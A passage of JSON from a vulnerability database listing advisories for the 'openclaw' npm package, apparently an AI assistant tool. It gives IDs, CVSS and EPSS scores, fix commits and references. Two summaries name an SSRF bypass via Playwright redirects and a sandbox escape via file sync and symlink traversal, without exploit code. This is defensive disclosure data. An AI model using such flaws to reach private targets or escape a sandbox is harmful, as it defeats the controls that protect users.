                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "CVE-2026-35650",
                "GHSA-39pp-xp36-q6mg"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-h9g5-xe4k-6udx"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89343?format=api",
            "vulnerability_id": "VCID-haxd-ps1x-h3ch",
            "summary": "OpenClaw: Strict browser SSRF bypass in Playwright redirect handling leaves private targets reachable\n## Impact\n\nStrict browser SSRF bypass in Playwright redirect handling leaves private targets reachable.\n\nStrict browser SSRF checks could miss Playwright request-time navigation to private targets.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `2026.3.8`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @smaeljaish771 for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42430",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00033",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10088",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00033",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10118",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00033",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10102",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42430"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:56:41Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-w8g9-x8gx-crmm",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:56:41Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-w8g9-x8gx-crmm"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42430",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42430"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-strict-browser-ssrf-bypass-via-playwright-redirect-handling",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-30T12:56:41Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-strict-browser-ssrf-bypass-via-playwright-redirect-handling"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-w8g9-x8gx-crmm",
                    "reference_id": "GHSA-w8g9-x8gx-crmm",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-w8g9-x8gx-crmm"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.8",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2g7x-vu14-nkde"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dqb2-dej7-augt"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-wyat-1259-2kg9"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"
                }
            ],
            "aliases": [
                "CVE-2026-42430",
                "GHSA-w8g9-x8gx-crmm"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-haxd-ps1x-h3ch"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89349?format=api",
            "vulnerability_id": "VCID-hd4w-s3dp-nubj",
            "summary": "OpenClaw: OpenShell Mirror Sync — Sandbox Escape via Unrestricted File Sync + Symlink Traversal\n## Summary\nOpenShell Mirror Sync: Sandbox Escape via Unrestricted File Sync + Symlink Traversal\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: high\n- Assessment: v2026.3.28 still has the mirror-boundary bug because shipped c02ee8 only excluded hooks while unreleased 3b9dab is the first full symlink-free upload and download hardening.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `c02ee8a3a4cb390b23afdf21317aa8b2096854d1` — 2026-03-25T19:59:07Z\n- `3b9dab0ece4643a9643e6a45459f5c709d3ce320` — 2026-03-30T14:51:44+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41397",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00075",
                            "scoring_system": "epss",
                            "scoring_elements": "0.2259",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00075",
                            "scoring_system": "epss",
                            "scoring_elements": "0.22636",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00075",
                            "scoring_system": "epss",
                            "scoring_elements": "0.22651",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41397"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/3b9dab0ece4643a9643e6a45459f5c709d3ce320",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.8",
                            "scoring_system": "cvssv3.1",
